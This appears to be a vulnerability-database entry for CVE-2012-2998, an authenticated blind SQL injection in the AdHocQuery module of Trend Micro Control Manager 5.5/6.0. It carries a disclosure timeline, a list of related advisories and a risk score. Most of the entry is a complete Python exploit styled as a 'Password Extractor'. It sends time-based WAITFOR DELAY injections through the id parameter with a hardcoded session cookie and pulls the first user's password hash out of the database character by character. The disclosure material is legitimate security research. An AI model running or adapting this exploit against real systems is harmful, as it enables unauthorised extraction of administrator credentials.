Trend Micro Control Manager 5.5/6.0 AdHocQuery - (Authenticated) Blind SQL Injection

🗓️ 27 Sep 2012 00:00:00Reported by otoyType

Trend Micro Control Manager web-based console, version 5.5/6.0, is vulnerable to AdHocQuery Blind SQL Injection (post-auth) leading to sensitive data exposure. The injection occurs in the id parameter of the AdHocQuery module, allowing an attacker to delay responses and extract passwords from the database

Reporter	Title	Published	Views	Family All 15
0day.today	Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)	27 Sep 201200:00	–	zdt
Circl	CVE-2012-2998	27 Sep 201200:00	–	circl
Check Point Advisories	Trend Micro Control Manager ad hoc query Module SQL Injection (CVE-2012-2998)	18 Nov 201200:00	–	checkpoint_advisories
CVE	CVE-2012-2998	28 Sep 201210:00	–	cve
Cvelist	CVE-2012-2998	28 Sep 201210:00	–	cvelist
EUVD	EUVD-2012-2976	7 Oct 202500:30	–	euvd
exploitpack	Trend Micro Control Manager 5.56.0 AdHocQuery - (Authenticated) Blind SQL Injection	27 Sep 201200:00	–	exploitpack
Japan Vulnerability Notes	JVN#42014489: Trend Micro Control Manager vulnerable to SQL injection	27 Sep 201200:00	–	jvn
Japan Vulnerability Notes	Trend Micro Control Manager vulnerable to SQL injection	27 Sep 201203:43	–	jvn
NVD	CVE-2012-2998	28 Sep 201210:40	–	nvd

#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and 
# policy violations, and automates routine tasks. New features include a customizable dashboard 
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network, 
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the 
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds, 
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some 
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|    Trend Micro Control Manager BlindSQLi Password Extractor   |
|                         CVE-2012-2998				|
|          by otoy & modpr0be (research[at]spentera.com)	|
|                                                               |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
       	return ord(hex(item).replace('0x',''))

def konek(m,n):
	#borrow from SQLmap :)
	query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
	       " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

	values = { 'Action': 'View',             
        	   'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
        	   'asc': 'true',
        	   'Sort': 7,
	           'paging': 10 }
 
	url = "%s?%s" % (target, urllib.urlencode(values)) 
	req = urllib2.Request(url)                         
	req.add_header('Cookie', cookie)                  
	try:                                        
    		starttime=time.time()
    		response = urllib2.urlopen(req)     
    		endtime = time.time()
    		return int(endtime-starttime)
	except:                                             
    		print '\n[-] Uh oh! Exploit fail..'                
    		sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
	for n in range(0,16):
		wkttunggu = konek(m,Hex2Des(n))	
		if (wkttunggu < delay):				
			sys.stdout.write(chr(Hex2Des(n)))
			sys.stdout.flush()
			break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

27 Sep 2012 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 27.5

EPSS0.10661